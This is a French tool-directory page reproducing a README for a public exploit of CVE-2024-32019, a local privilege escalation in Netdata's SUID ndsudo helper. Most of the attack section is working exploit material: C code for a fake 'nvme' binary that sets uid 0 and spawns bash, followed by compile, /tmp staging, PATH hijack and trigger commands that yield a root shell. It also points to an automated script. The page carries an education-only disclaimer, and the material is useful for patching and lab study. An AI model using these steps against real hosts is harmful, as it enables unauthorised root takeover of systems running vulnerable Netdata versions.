Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation — CVE-2024-32019 est une vulnérabilité d'élévation de privilèges locaux de sévérité élevée dans Netdata (versions >= 1.44.0-60 < 1.45.3), causée par une utilisation non sécurisée de la variable PATH dans le binaire SUID ndsudo, permettant à des attaquants d'exécuter des commandes arbitraires en tant que root. | Kitploit
Outils/GitHubGitHub/dollarboysushil/cve-2024-32019-netdata-ndsudo-path-vulnerability-privilege-escalation
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges UtilesExploitation de BinairesLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

CVE-2024-32019 est une vulnérabilité d'élévation de privilèges locaux de sévérité élevée dans Netdata (versions >= 1.44.0-60 < 1.45.3), causée par une utilisation non sécurisée de la variable PATH dans le binaire SUID ndsudo, permettant à des attaquants d'exécuter des commandes arbitraires en tant que root.

GitHub
dollarboysushil/cve-2024-32019-netdata-ndsudo-path-vulnerability-privilege-escalation

CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation

Voir le dépôtSite web
1412il y a 1 anPas encore vérifié
Partager

🚨 CVE-2024-32019 - Exploitation de la vulnérabilité de PATH dans ndsudo de Netdata (LPE vers root)

Un exploit basé sur Python pour CVE-2024-32019, une vulnérabilité de haute sévérité d'élévation de privilèges locaux dans l'Agent Netdata, exploitant un binaire SUID mal configuré (ndsudo) qui ne gère pas correctement la variable d'environnement PATH.


[!Caution] Ce code est destiné uniquement à des fins éducatives et de tests autorisés. Toute utilisation non autorisée de cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas obtenu une autorisation explicite est illégale.

🔍 Aperçu

ID CVE : CVE-2024-32019
Score CVSS : 8.8 (Élevé)
Divulgué : 12 avril 2024
Composant : Agent Netdata
Versions concernées :

  • >= v1.45.0, < v1.45.3
  • >= v1.44.0-60, < v1.45.0-169

🧠 Résumé technique

L'outil ndsudo de Netdata est un binaire SUID root conçu pour exécuter de manière sécurisée un ensemble limité de commandes système (comme nvme) pour le compte d'utilisateurs non root.

Cependant, en raison d'un défaut d'implémentation, il respecte la variable PATH contrôlée par l'utilisateur lors de la résolution des binaires de commandes. Si un attaquant peut manipuler le PATH pour inclure un répertoire accessible en écriture contenant un binaire malveillant, ndsudo l'exécutera avec les privilèges root — entraînant une élévation de privilèges locaux.


💥 Étapes d'exploitation manuelle

Les étapes suivantes montrent comment exploiter manuellement la vulnérabilité dans ndsudo.

1. Créer un binaire d'élévation de privilèges

Enregistrez le code C suivant sous nvme.c :

root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}

2. Compiler l'exploit

root@kitploit:~
gcc nvme.c -o nvme

3. Préparer l'environnement d'exploit sur la cible

root@kitploit:~
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme

4. Modifier le PATH

root@kitploit:~
export PATH=/tmp/fakebin:$PATH
which nvme
# Sortie : /tmp/fakebin/nvme

5. Déclencher l'exploit

root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

En cas de succès, vous obtiendrez un shell root.

root@kitploit:~
# whoami
root

Exploitation automatique

Si vous avez un accès SSH, vous pouvez utiliser CVE-2024-32019-dbs.py pour automatiser ce processus.

Exploitation à l'aide du script

📎 Références

  • Avis de sécurité GitHub
  • Score CVSS : 8.8 (Élevé)
  • CVE-2024-32019 : analyse et atténuation de la vulnérabilité Netdata
Télécharger l’outil